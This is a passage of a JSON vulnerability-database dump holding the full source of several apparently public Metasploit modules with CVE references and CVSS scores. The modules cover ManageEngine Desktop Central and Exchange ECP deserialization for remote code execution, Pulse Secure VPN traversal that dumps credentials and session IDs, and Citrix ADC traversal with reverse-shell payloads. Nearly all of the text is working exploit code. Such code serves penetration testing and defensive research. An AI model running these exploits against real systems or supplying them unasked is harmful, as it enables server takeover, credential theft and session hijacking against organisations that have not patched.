))\n end\n end\n\n def execute_command(cmd, _opts = {})\n # XXX: An executable is required to run arbitrary commands\n cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper\n\n vprint_status(\"Serializing command: #{cmd}\")\n\n # I identified mr_me's binary blob as the CommonsBeanutils1 payload :)\n serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(\n 'CommonsBeanutils1',\n cmd\n )\n\n # XXX: Patch in expected serialVersionUID\n serialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\"\n\n # Rock 'n' roll!\n upload_serialized_payload(serialized_payload)\n deserialize_payload\n end\n\n def upload_serialized_payload(serialized_payload)\n print_status('Uploading serialized payload')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/mdm/client/v1/mdmLogUploader'),\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n # Traversal from C:\\Program Files\\DesktopCentral_Server\\mdm-logs\\foo\\bar\n 'udid' => '\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart',\n 'filename' => 'logger.zip'\n },\n 'data' => serialized_payload\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')\n end\n\n print_good('Successfully uploaded serialized payload')\n\n # Shell lands in C:\\Program Files\\DesktopCentral_Server\\bin\n register_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip')\n end\n\n def deserialize_payload\n print_status('Deserializing payload')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'cewolf'),\n 'vars_get' => {\n 'img' => '\\\\logger.zip'\n }\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')\n end\n\n print_good('Successfully deserialized payload')\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/desktopcentral_deserialization.rb"}, {"lastseen": "2020-05-30T20:03:43", "bulletinFamily": "exploit", "description": "This module exploits a pre-auth directory traversal in the Pulse Secure VPN server to dump an arbitrary file. Dumped files are stored in loot. If the \"Automatic\" action is set, plaintext and hashed credentials, as well as session IDs, will be dumped. Valid sessions can be hijacked by setting the \"DSIG\" browser cookie to a valid session ID. For the \"Manual\" action, please specify a file to dump via the \"FILE\" option. /etc/passwd will be dumped by default. If the \"PRINT\" option is set, file contents will be printed to the screen, with any unprintable characters replaced by a period. Please see related module exploit/linux/http/pulse_secure_cmd_exec for a post-auth exploit that can leverage the results from this module.\n", "modified": "2020-01-14T06:34:06", "published": "2019-08-21T20:58:58", "id": "MSF:AUXILIARY/GATHER/PULSE_SECURE_FILE_DISCLOSURE", "href": "", "type": "metasploit", "title": "Pulse Secure VPN Arbitrary File Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Pulse Secure VPN Arbitrary File Disclosure',\n 'Description' => %q{\n This module exploits a pre-auth directory traversal in the Pulse Secure\n VPN server to dump an arbitrary file. Dumped files are stored in loot.\n\n If the \"Automatic\" action is set, plaintext and hashed credentials, as\n well as session IDs, will be dumped. Valid sessions can be hijacked by\n setting the \"DSIG\" browser cookie to a valid session ID.\n\n For the \"Manual\" action, please specify a file to dump via the \"FILE\"\n option. /etc/passwd will be dumped by default. If the \"PRINT\" option is\n set, file contents will be printed to the screen, with any unprintable\n characters replaced by a period.\n\n Please see related module exploit/linux/http/pulse_secure_cmd_exec for\n a post-auth exploit that can leverage the results from this module.\n },\n 'Author' => [\n 'Orange Tsai', # Discovery (@orange_8361)\n 'Meh Chang', # Discovery (@mehqq_)\n 'Alyssa Herrera', # PoC (@Alyssa_Herrera_)\n 'Justin Wagner', # Module (@0xDezzy)\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2019-11510'],\n ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'],\n ['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'],\n ['URL', 'https://hackerone.com/reports/591295']\n ],\n 'DisclosureDate' => '2019-04-24', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Automatic', 'Description' => 'Dump creds and sessions'],\n ['Manual', 'Description' => 'Dump an arbitrary file (FILE option)']\n ],\n 'DefaultAction' => 'Automatic',\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'HttpClientTimeout' => 5 # This seems sane\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [IOC_IN_LOGS],\n 'RelatedModules' => ['exploit/linux/http/pulse_secure_cmd_exec']\n }\n ))\n\n register_options([\n OptString.new(\n 'FILE',\n [\n true,\n 'File to dump (manual mode only)',\n '/etc/passwd'\n ]\n ),\n OptBool.new(\n 'PRINT',\n [\n false,\n 'Print file contents (manual mode only)',\n true\n ]\n )\n ])\n end\n\n def the_chosen_one\n return datastore['FILE'], 'User-chosen file'\n end\n\n def run\n files =\n case action.name\n when 'Automatic'\n print_status('Running in automatic mode')\n\n # Order by most sensitive first\n [\n plaintext_creds,\n session_ids,\n hashed_creds\n ]\n when 'Manual'\n print_status('Running in manual mode')\n\n # /etc/passwd by default\n [the_chosen_one]\n end\n\n files.each do |path, info|\n print_status(\"Dumping #{path}\")\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => dir_traversal(path),\n 'partial' => true # Allow partial response due to timeout\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Could not dump #{path}\")\n end\n\n handle_response(res, path, info)\n end\n end\n\n def handle_response(res, path, info)\n case res.code\n when 200\n case action.name\n when 'Automatic'\n # TODO: Parse plaintext and hashed creds\n if path == session_ids.first\n print_status('Parsing session IDs...')\n\n parse_sids(res.body).each do |sid|\n print_good(\"Session ID found: #{sid}\")\n end\n end\n when 'Manual'\n printable = res.body.gsub(/[^[:print:][:space:]]/, '.')\n\n print_line(printable) if datastore['PRINT']\n end\n\n print_good(store_loot(\n self.name, # ltype\n 'application/octet-stream', # ctype\n rhost, # host\n res.body, # data\n path, # filename\n info # info\n ))\n when 302\n fail_with(Failure::NotVulnerable, \"Redirected to #{res.redirection}\")\n when 400\n print_error(\"Invalid path #{path}\")\n when 404\n print_error(\"#{path} not found\")\n else\n print_error(\"I don't know what a #{res.code} code is\")\n end\n end\n\n def dir_traversal(path)\n normalize_uri(\n '/dana-na/../dana/html5acc/guacamole/../../../../../..',\n \"#{path}?/dana/html5acc/guacamole/\" # Bypass query/vars_get\n )\n end\n\n def parse_sids(body)\n body.to_s.scan(/randomVal([[:xdigit:]]+)/).flatten.reverse\n end\n\n def plaintext_creds\n return '/data/runtime/mtmp/lmdb/dataa/data.mdb', 'Plaintext credentials'\n end\n\n def session_ids\n return '/data/runtime/mtmp/lmdb/randomVal/data.mdb', 'Session IDs'\n end\n\n def hashed_creds\n return '/data/runtime/mtmp/system', 'Hashed credentials'\n end\n\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/pulse_secure_file_disclosure.rb"}, {"lastseen": "2020-05-28T00:09:25", "bulletinFamily": "exploit", "description": "This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.\n", "modified": "2020-04-21T01:06:52", "published": "2020-01-13T17:16:49", "id": "MSF:EXPLOIT/LINUX/HTTP/CITRIX_DIR_TRAVERSAL_RCE", "href": "", "type": "metasploit", "title": "Citrix ADC (NetScaler) Directory Traversal RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC (NetScaler) Directory Traversal RCE',\n 'Description' => %q{\n This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka\n NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.\n },\n 'Author' => [\n 'Project Zero India', # PoC used by this module\n 'TrustedSec', # PoC used by this module\n 'James Brytan', # PoC contributed independently\n 'James Smith', # PoC contributed independently\n 'Marisa Mack', # PoC contributed independently\n 'Rob Vinson', # PoC contributed independently\n 'Sergey Pashevkin', # PoC contributed independently\n 'Steven Laura', # PoC contributed independently\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (https://www.pirates.re/)\n ],\n 'References' => [\n ['CVE', '2019-19781'],\n ['EDB', '47901'],\n ['EDB', '47902'],\n ['URL', 'https://support.citrix.com/article/CTX267027/'],\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/']\n ],\n 'DisclosureDate' => '2019-12-17',\n 'License' => MSF_LICENSE,\n 'Platform' => ['python', 'unix'],\n 'Arch' => [ARCH_PYTHON, ARCH_CMD],\n 'Privileged' => false,\n 'Targets' => [\n ['Python',\n 'Platform' => 'python',\n 'Arch' => ARCH_PYTHON,\n 'Type' => :python,\n 'DefaultOptions' => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'}\n ],\n ['Unix Command',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_command,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/citrix_dir_traversal',\n 'HttpClientTimeout' => 3.5\n },\n 'Notes' => {\n 'AKA' => ['Shitrix'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ])\n end\n\n def cmd_unix_generic?\n datastore['PAYLOAD'] == 'cmd/unix/generic'\n end\n\n def exploit\n unless datastore['ForceExploit']\n case check\n when CheckCode::Vulnerable\n print_good('The target appears to be vulnerable')\n when CheckCode::Safe\n fail_with(Failure::NotVulnerable, 'The target does not appear to be vulnerable')\n else\n fail_with(Failure::Unknown, 'The target vulnerability state is unknown')\n end\n end\n\n print_status(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\")\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n case target['Type']\n when :python\n execute_command(%(/var/python/bin/python2 -c \"#{payload.encoded}\"))\n when :unix_command\n if (res = execute_command(payload.encoded)) && cmd_unix_generic?\n print_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, ''))\n end\n end\n end\n\n def execute_command(cmd, _opts = {})\n filename = rand_text_alpha(8..42)\n nonce = rand_text_alpha(8..42)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'),\n 'headers' => {\n 'NSC_USER' => \"../../../netscaler/portal/templates/#{filename}\",\n 'NSC_NONCE' => nonce\n },\n 'vars_post' => {\n 'url' => rand_text_alpha(8..42),\n 'title' => \"[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]\"\n }\n )\n\n unless res && res.code == 200\n print_error('No response to POST newbm.pl request')\n return\n end\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"/vpn/../vpns/portal/#{filename}.xml\"),\n 'headers' => {\n 'NSC_USER' => rand_text_alpha(8..42),\n 'NSC_NONCE' => nonce\n },\n 'partial' => true\n )\n\n unless res && res.code == 200\n print_warning(\"No response to GET #{filename}.xml request\")\n end\n\n register_files_for_cleanup(\n \"/netscaler/portal/templates/#{filename}.xml\",\n \"/var/tmp/netscaler/portal/templates/#{filename}.xml.ttc2\"\n )\n\n res\n end\n\n def chr_payload(cmd)\n cmd.each_char.map { |c| \"chr(#{c.ord})\" }.join('.')\n end\n\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/citrix_dir_traversal_rce.rb"}, {"lastseen": "2020-05-30T19:59:35", "bulletinFamily": "exploit", "description": "This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of a \"[global]\" directive in smb.conf, which this file should always contain.\n", "modified": "2020-01-14T17:21:03", "published": "2020-01-13T17:16:49", "id": "MSF:AUXILIARY/SCANNER/HTTP/CITRIX_DIR_TRAVERSAL", "href": "", "type": "metasploit", "title": "Citrix ADC (NetScaler) Directory Traversal Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC (NetScaler) Directory Traversal Scanner',\n 'Description' => %{\n This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC\n (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request\n /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of\n a \"[global]\" directive in smb.conf, which this file should always contain.\n },\n 'Author' => [\n 'Erik Wynter', # Module (@wyntererik)\n 'altonjx' # Module (@altonjx)\n ],\n 'References' => [\n ['CVE', '2019-19781'],\n ['URL', 'https://support.citrix.com/article/CTX267027/']\n ],\n 'DisclosureDate' => '2019-12-17',\n 'License' => MSF_LICENSE,\n 'Notes' => {\n 'AKA' => ['Shitrix']\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('PATH', [true, 'Traversal path', '/vpn/../vpns/cfg/smb.conf'])\n ])\n end\n\n def run_host(target_host)\n turi = normalize_uri(target_uri.path, datastore['PATH'])\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => turi\n )\n\n unless res\n print_error(\"#{full_uri(turi)} - No response, target seems down.\")\n\n return Exploit::CheckCode::Unknown\n end\n\n unless res.code == 200\n print_error(\"#{full_uri(turi)} - The target is not vulnerable to CVE-2019-19781.\")\n vprint_error(\"Obtained HTTP response code #{res.code} for #{full_uri(turi)}.\")\n\n return Exploit::CheckCode::Safe\n end\n\n if turi.end_with?('smb.conf')\n unless res.headers['Content-Type'].starts_with?('text/plain') && res.body.match(/\\[\\s*global\\s*\\]/)\n vprint_warning(\"#{turi} does not contain \\\"[global]\\\" directive.\")\n end\n end\n\n print_good(\"#{full_uri(turi)} - The target is vulnerable to CVE-2019-19781.\")\n msg = \"Obtained HTTP response code #{res.code} for #{full_uri(turi)}. \" \\\n \"This means that access to #{turi} was obtained via directory traversal.\"\n vprint_good(msg)\n\n report_vuln(\n host: target_host,\n name: name,\n refs: references,\n info: msg\n )\n\n Exploit::CheckCode::Vulnerable\n end\n\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/citrix_dir_traversal.rb"}, {"lastseen": "2020-05-30T13:59:16", "bulletinFamily": "exploit", "description": "This module exploits a .NET serialization vulnerability in the Exchange Control Panel (ECP) web page. The vulnerability is due to Microsoft Exchange Server not randomizing the keys on a per-installation basis resulting in them using the same validationKey and decryptionKey values. With knowledge of these values, an attacker can craft a special ViewState to cause an OS command to be executed by NT_AUTHORITY\\SYSTEM using .NET deserialization.\n", "modified": "2020-05-20T14:47:11", "published": "2020-02-28T02:57:08", "id": "MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_ECP_VIEWSTATE", "href": "", "type": "metasploit", "title": "Exchange Control Panel ViewState Deserialization", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'bindata'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n # include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n DEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27'\n VALIDATION_KEY = \"\\xcb\\x27\\x21\\xab\\xda\\xf8\\xe9\\xdc\\x51\\x6d\\x62\\x1d\\x8b\\x8b\\xf1\\x3a\\x2c\\x9e\\x86\\x89\\xa2\\x53\\x03\\xbf\"\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Exchange Control Panel ViewState Deserialization',\n 'Description' => %q{\n This module exploits a .NET serialization vulnerability in the\n Exchange Control Panel (ECP) web page. The vulnerability is due to\n Microsoft Exchange Server not randomizing the keys on a\n per-installation basis resulting in them using the same validationKey\n and decryptionKey values. With knowledge of these values, an attacker\n can craft a special ViewState to cause an OS command to be executed\n by NT_AUTHORITY\\SYSTEM using .NET deserialization.\n },\n 'Author' => 'Spencer McIntyre',\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2020-0688'],\n ['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'],\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],\n [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],\n [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ]\n ],\n 'DefaultOptions' =>\n {\n 'SSL' => true\n },\n 'DefaultTarget' => 1,\n 'DisclosureDate' => '2020-02-11',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE, ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n },\n 'Privileged' => true\n ))\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\n ])\n\n register_advanced_options([\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\n ])\n end\n\n def check\n state = get_request_setup\n viewstate = state[:viewstate]\n return CheckCode::Unknown if viewstate.nil?\n\n viewstate = Rex::Text.decode_base64(viewstate)\n body = viewstate[0...-20]\n signature = viewstate[-20..-1]\n\n unless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature\n return CheckCode::Safe\n end\n\n # we've validated the signature matches based on the data we have and thus\n # proven that we are capable of signing a viewstate ourselves\n CheckCode::Vulnerable\n end\n\n def generate_viewstate(generator, session_id, cmd)\n viewstate = ::Msf::Util::DotNetDeserialization.generate(\n cmd,\n gadget_chain: :TextFormattingRunProperties,\n formatter: :LosFormatter\n )\n signature = generate_viewstate_signature(generator, session_id, viewstate)\n Rex::Text.encode_base64(viewstate + signature)\n end\n\n def generate_viewstate_signature(generator, session_id, viewstate)\n mac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>')\n mac_key_bytes << Rex::Text.to_unicode(session_id)\n OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes)\n end\n\n def exploit\n state = get_request_setup\n\n # the major limit is the max length of a GET request, the command will be\n # XML escaped and then base64 encoded which both increase the size\n if target.arch.first == ARCH_CMD\n execute_command(payload.encoded, opts={state: state})\n else\n cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first\n execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})\n end\n end\n\n def execute_command(cmd, opts)\n state = opts[:state]\n viewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd)\n 5.times do |iteration|\n # this request *must* be a GET request, can't use POST to use a larger viewstate\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\n 'cookie' => state[:cookies].join(''),\n 'agent' => state[:user_agent],\n 'vars_get' => {\n '__VIEWSTATE' => viewstate,\n '__VIEWSTATEGENERATOR' => state[:viewstate_generator]\n }\n })\n break\n rescue Rex::ConnectionError, Errno::ECONNRESET => e\n vprint_warning('Encountered a connection error while sending the command, sleeping before retrying')\n sleep iteration\n end\n end\n\n def get_request_setup\n # need to use a newer default user-agent than what Metasploit currently provides\n # see: https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43'\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'),\n 'method' => 'POST',\n 'agent' => user_agent,\n 'vars_post' => {\n 'password' => datastore['PASSWORD'],\n 'flags' => '4',\n 'destination' => full_uri(normalize_uri(target_uri.path, 'owa'), vhost_uri: true),\n 'username' => datastore['USERNAME']\n }\n })\n fail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil?\n cookies = [res.get_cookies]\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\n 'cookie' => res.get_cookies,\n 'agent' => user_agent\n })\n fail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200\n cookies << res.get_cookies\n\n viewstate_generator = res.body.scan(/id=\"__VIEWSTATEGENERATOR\"\\s+value=\"([a-fA-F0-9]{8})\"/).flatten[0]\n if viewstate_generator.nil?\n print_warning(\"Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}\")\n viewstate_generator = DEFAULT_VIEWSTATE_GENERATOR\n else\n vprint_status(\"Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}\")\n end\n\n viewstate = res.body.scan(/id=\"__VIEWSTATE\"\\s+value=\"([a-zA-Z0-9\\+\\/]+={0,2})\"/).flatten[0]\n if viewstate.nil?\n vprint_warning('Failed to find the __VIEWSTATE value')\n end\n\n session_id = res.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\n if session_id.nil?\n fail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies')\n end\n vprint_status(\"Recovered the ASP.NET_SessionID: #{session_id}\")\n\n {user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id}\n end\nend\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_ecp_viewstate.rb"}], "packetstorm": [{"lastseen": "2020-03-14T22:50:18", "bulletinFamily": "exploit", "description": "", "modified": "2020-03-14T00:00:00", "published": "2020-03-14T00:00:00", "id": "PACKETSTORM:156730", "href": "https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html", "title": "ManageEngine Desktop Central Java Deserialization", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ManageEngine Desktop Central Java Deserialization', \n'Description' => %q{ \nThis module exploits a Java deserialization vulnerability in the \ngetChartImage() method from the FileStorage class within ManageEngine \nDesktop Central versions < 10.0.474. Tested against 10.0.465 x64. \n \n\"The short-term fix for the arbitrary file upload vulnerability was \nreleased in build 10.0.474 on January 20, 2020. In continuation of that, \nthe complete fix for the remote code execution vulnerability is now \navailable in build 10.0.479.\" \n}, \n'Author' => [ \n'mr_me', # Discovery and exploit \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-10189'], \n['URL', 'https://srcincite.io/advisories/src-2020-0011/'], \n['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'], \n['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'], \n['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html'] \n], \n'DisclosureDate' => '2020-03-05', # 0day release \n'License' => MSF_LICENSE, \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n['Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd \n], \n['Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper \n], \n['PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'RPORT' => 8383, \n'SSL' => true, \n'WfsDelay' => 60 # It can take a little while to trigger \n}, \n'CmdStagerFlavor' => 'certutil', # This works without issue \n'Notes' => { \n'PatchedVersion' => Gem::Version.new('100474'), \n'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page? \n'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'configurations.do') \n) \n \nunless res \nreturn CheckCode::Unknown('Target is not responding to check') \nend \n \nunless res.code == 200 && res.body.include?('ManageEngine Desktop Central') \nreturn CheckCode::Unknown('Target is not running Desktop Central') \nend \n \nversion = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text \n \nunless version \nreturn CheckCode::Detected('Could not detect Desktop Central version') \nend \n \nvprint_status(\"Detected Desktop Central version #{version}\") \n \nif Gem::Version.new(version) < notes['PatchedVersion'] \nreturn CheckCode::Appears(\"#{version} is an exploitable version\") \nend \n \nCheckCode::Safe(\"#{version} is not an exploitable version\") \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \n# XXX: An executable is required to run arbitrary commands \ncmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper \n \nvprint_status(\"Serializing command: #{cmd}\") \n \n# I identified mr_me's binary blob as the CommonsBeanutils1 payload :) \nserialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload( \n'CommonsBeanutils1', \ncmd \n) \n \n# XXX: Patch in expected serialVersionUID \nserialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\" \n \n# Rock 'n' roll! \nupload_serialized_payload(serialized_payload) \ndeserialize_payload \nend \n \ndef upload_serialized_payload(serialized_payload) \nprint_status('Uploading serialized payload') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, \n'/mdm/client/v1/mdmLogUploader'), \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart', \n'filename' => 'logger.zip' \n}, \n'data' => serialized_payload \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not upload serialized payload') \nend \n \nprint_good('Successfully uploaded serialized payload') \n \n# C:\\Program Files\\DesktopCentral_Server\\bin \nregister_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip') \nend \n \ndef deserialize_payload \nprint_status('Deserializing payload') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'cewolf/'), \n'vars_get' => {'img' => '\\\\logger.zip'} \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not deserialize payload') \nend \n \nprint_good('Successfully deserialized payload') \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156730/desktopcentral_deserialization.rb.txt"}, {"lastseen": "2019-08-22T05:38:44", "bulletinFamily": "exploit", "description": "", "modified": "2019-08-21T00:00:00", "published": "2019-08-21T00:00:00", "id": "PACKETSTORM:154176", 